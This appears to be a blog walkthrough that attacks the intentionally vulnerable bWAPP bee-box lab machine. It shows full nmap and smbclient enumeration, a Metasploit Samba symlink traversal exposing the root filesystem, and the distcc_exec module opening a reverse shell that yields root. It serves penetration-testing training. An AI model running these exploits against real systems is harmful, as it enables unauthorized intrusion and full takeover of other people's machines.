In bWAPP there is a module which allows for reading or writing of arbitrary files on a remote host running the samba sharing service. Our goal is to successfully exploit these vulnerabiltes on the remote host using the metasploit framework.
Lets first start off with an nmap scan of the remote host.
root@ubuntu:~# nmap -sV -sC -p 139,445 -T4 192.168.56.101 Starting Nmap 7.60 ( https://nmap.org ) at 2020-02-06 15:39 MST Nmap scan report for 192.168.56.101 Host is up (0.00034s latency). PORT STATE SERVICE VERSION 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: ITSECGAMES) 445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: ITSECGAMES) MAC Address: 08:00:27:73:40:55 (Oracle VirtualBox virtual NIC) Host script results: |_clock-skew: mean: -2s, deviation: 0s, median: -2s |_nbstat: NetBIOS name: BEE-BOX, NetBIOS user:, NetBIOS MAC: (unknown) | smb-os-discovery: | OS: Unix (Samba 3.0.28a) | Computer name: bee-box | NetBIOS computer name: | Domain name: | FQDN: bee-box |_ System time: 2020-02-06T23:40:05+01:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smb2-time: Protocol negotiation failed (SMB2) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.25 seconds root@ubuntu:~#
We see that samba is running and get the name of the samba service running on the remote host.
We first start out by querying the samba server to list its avaiable shares.
sam@ubuntu:~$ smbclient -L //192.168.56.101 WARNING: The "syslog" option is deprecated Enter WORKGROUP\sam's password: Anonymous login successful Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers tmp Disk oh noes! opt Disk IPC$ IPC IPC Service (bee-box server (Samba 3.0.28a)) Xerox_Phaser_8500DN_PS:7 Printer Xerox Phaser 8500DN PS Snagit_9:6 Printer Snagit 9 Send_To_OneNote_2010:8 Printer Send To OneNote 2010 PDF Printer PDF Microsoft_XPS_Document_Writer:1 Printer Microsoft XPS Document Writer HP_Officejet_6500_E710a-f_(Network):5 Printer HP Officejet 6500 E710a-f (Network) Fax_-_HP_Officejet_6500_E710a-f_(Network):4 Printer Fax - HP Officejet 6500 E710a-f (Network) Fax:2 Printer Fax CutePDF_Writer:3 Printer CutePDF Writer Reconnecting with SMB1 for workgroup listing. Anonymous login successful Server Comment --------- ------- Workgroup Master --------- ------- ITSECGAMES BEE-BOX sam@ubuntu:~$
As you can see we have a few shares avaiable to us. Lets take a look at two of them.
sam@ubuntu:~$ smbclient //192.168.56.101/opt WARNING: The "syslog" option is deprecated Enter WORKGROUP\sam's password: Anonymous login successful tree connect failed: NT_STATUS_ACCESS_DENIED sam@ubuntu:~$ smbclient //192.168.56.101/tmp WARNING: The "syslog" option is deprecated Enter WORKGROUP\sam's password: Anonymous login successful Try "help" to get a list of possible commands. smb: \>
We we only able to accesss the tmp share without a password. lets list the directory contents and see what there.
smb: \> ls . D 0 Thu Feb 6 14:55:28 2020 .. D 0 Thu Feb 6 14:02:39 2020 pulse-bee D 0 Thu Feb 6 14:02:57 2020 .X0-lock HR 11 Thu Feb 6 14:02:49 2020 seahorse-yeRc1i D 0 Thu Feb 6 14:02:55 2020 orbit-bee D 0 Thu Feb 6 14:03:11 2020 .X11-unix DH 0 Thu Feb 6 14:02:49 2020 .ICE-unix DH 0 Thu Feb 6 14:02:55 2020 Tracker-bee.5866 D 0 Thu Feb 6 14:03:10 2020 virtual-bee.Dqh0Mw D 0 Thu Feb 6 14:03:03 2020 .gdm7IYNF0 H 118 Thu Feb 6 14:02:52 2020 vmware-bee D 0 Thu Feb 6 14:03:00 2020 keyring-aQbfLk D 0 Thu Feb 6 14:02:56 2020 gconfd-bee D 0 Thu Feb 6 14:02:54 2020 .X1-lock HR 11 Thu Feb 6 14:02:43 2020 php.socket-0 A 0 Thu Feb 6 14:02:52 2020 .esd-1000 DH 0 Thu Feb 6 14:02:57 2020 php.socket-1 A 0 Thu Feb 6 14:02:52 2020 ssh-FpQxrU5427 D 0 Thu Feb 6 14:02:53 2020 tmp.gIGDje5481 N 0 Thu Feb 6 14:02:52 2020 19891060 blocks of size 1024. 15583076 blocks available smb: \>
Not much here just some temporary files which are held in the /tmp directory on the remote host. Lets next move on to exploiting the samba service.
Samba Symlink Directory Traversal
In metaspolit there are a few options we can use to exploit the remote samba service. One of those is the symlink directory traversal found in the metasploit framework.
What this exploit does is find a writable share and link a newly created directory to the root filesystem so you can access the root filesystem from the writble share.
msf5 > use auxiliary/admin/smb/samba_symlink_traversal msf5 auxiliary(admin/smb/samba_symlink_traversal) > show options Module options (auxiliary/admin/smb/samba_symlink_traversal): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' RPORT 445 yes The SMB service port (TCP) SMBSHARE yes The name of a writeable share on the server SMBTARGET rootfs yes The name of the directory that should point to the root filesystem msf5 auxiliary(admin/smb/samba_symlink_traversal) > set RHOSTS 192.168.56.101 RHOSTS => 192.168.56.101 msf5 auxiliary(admin/smb/samba_symlink_traversal) > set SMBSHARE tmp SMBSHARE => tmp msf5 auxiliary(admin/smb/samba_symlink_traversal) > exploit [*] Running module against 192.168.56.101 [*] 192.168.56.101:445 - Connecting to the server... [*] 192.168.56.101:445 - Trying to mount writeable share 'tmp'... [*] 192.168.56.101:445 - Trying to link 'rootfs' to the root filesystem... [*] 192.168.56.101:445 - Now access the following share to browse the root filesystem: [*] 192.168.56.101:445 - \\192.168.56.101\tmp\rootfs\ [*] Auxiliary module execution completed msf5 auxiliary(admin/smb/samba_symlink_traversal) >
Now lets go and load up the //192.168.56.101/tmp directory and see if the newly created folder 'rootfs' is there so we can browse the root filesystem.
sam@ubuntu:~$ smbclient //192.168.56.101/tmp WARNING: The "syslog" option is deprecated Enter WORKGROUP\sam's password: Anonymous login successful Try "help" to get a list of possible commands. smb: \> ls . D 0 Thu Feb 6 14:42:00 2020 .. D 0 Thu Feb 6 14:02:39 2020 pulse-bee D 0 Thu Feb 6 14:02:57 2020 .X0-lock HR 11 Thu Feb 6 14:02:49 2020 rootfs D 0 Thu Feb 6 14:02:39 2020 seahorse-yeRc1i D 0 Thu Feb 6 14:02:55 2020 orbit-bee D 0 Thu Feb 6 14:03:11 2020 .X11-unix DH 0 Thu Feb 6 14:02:49 2020 .ICE-unix DH 0 Thu Feb 6 14:02:55 2020 Tracker-bee.5866 D 0 Thu Feb 6 14:03:10 2020 virtual-bee.Dqh0Mw D 0 Thu Feb 6 14:03:03 2020 .gdm7IYNF0 H 118 Thu Feb 6 14:02:52 2020 vmware-bee D 0 Thu Feb 6 14:03:00 2020 keyring-aQbfLk D 0 Thu Feb 6 14:02:56 2020 gconfd-bee D 0 Thu Feb 6 14:02:54 2020 .X1-lock HR 11 Thu Feb 6 14:02:43 2020 php.socket-0 A 0 Thu Feb 6 14:02:52 2020 .esd-1000 DH 0 Thu Feb 6 14:02:57 2020 php.socket-1 A 0 Thu Feb 6 14:02:52 2020 ssh-FpQxrU5427 D 0 Thu Feb 6 14:02:53 2020 tmp.gIGDje5481 N 0 Thu Feb 6 14:02:52 2020 19891060 blocks of size 1024. 15583084 blocks available smb: \> cd rootfs
the 'rootfs' is there, lets cd in to that directory and see what we have.
smb: \rootfs\> ls . D 0 Thu Feb 6 14:02:39 2020 .. D 0 Thu Feb 6 14:02:39 2020 bin D 0 Thu Mar 28 13:15:46 2013 tmp D 0 Thu Feb 6 14:42:00 2020 sys D 0 Thu Feb 6 14:02:15 2020 proc DR 0 Thu Feb 6 14:02:14 2020 boot D 0 Thu Mar 28 14:23:01 2013 etc D 0 Thu Feb 6 14:02:59 2020 opt D 0 Tue Apr 22 11:48:59 2008 media D 0 Tue Apr 22 11:48:59 2008 toolbox D 0 Mon Apr 1 14:42:27 2013 lib D 0 Mon Apr 1 10:40:57 2013 root D 0 Thu Feb 6 14:02:43 2020 dev D 0 Thu Feb 6 14:02:52 2020 initrd D 0 Tue Apr 22 11:48:59 2008 cdrom D 0 Thu Mar 28 13:09:30 2013 var D 0 Fri Apr 18 12:58:25 2014 usr D 0 Thu Mar 28 13:59:08 2013 lost+found D 0 Thu Mar 28 13:09:28 2013 lib64 D 0 Thu Mar 28 13:59:09 2013 home D 0 Thu Dec 12 05:03:56 2013 vmlinuz N 1904248 Thu Apr 10 10:51:33 2008 mnt D 0 Thu Mar 28 14:22:34 2013 srv D 0 Tue Apr 22 11:48:59 2008 initrd.img N 7475772 Thu Mar 28 14:23:00 2013 sbin D 0 Thu Mar 28 19:15:39 2013 19891060 blocks of size 1024. 15583084 blocks available smb: \rootfs\>
As you can see we got the root filesystem right there that we can now browse.
DistCC Daemon Command Execution
Metasploit offers us another route to explotation which the DistCC Daemon Command execution. This exploit allows anyone execute arbitrary commands on any system running distccd.
msf5 exploit(linux/samba/trans2open) > use exploit/unix/misc/distcc_exec msf5 exploit(unix/misc/distcc_exec) > show options Module options (exploit/unix/misc/distcc_exec): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' RPORT 3632 yes The target port (TCP) Exploit target: Id Name -- ---- 0 Automatic Target msf5 exploit(unix/misc/distcc_exec) > set RHOSTS 192.168.56.101 RHOSTS => 192.168.56.101 msf5 exploit(unix/misc/distcc_exec) > exploit [*] Started reverse TCP double handler on 192.168.56.1:4444 [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo 5M8mmJmsD4wodODT; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket A [*] A: "5M8mmJmsD4wodODT\r\n" [*] Matching... [*] B is input... [*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.101:33553) at 2020-02-06 14:47:26 -0700 id uid=0(root) gid=0(root) groups=0(root) whoami root
As you can see we are root and have access to the remote system via DistCC Daemon.
No comments:
Post a Comment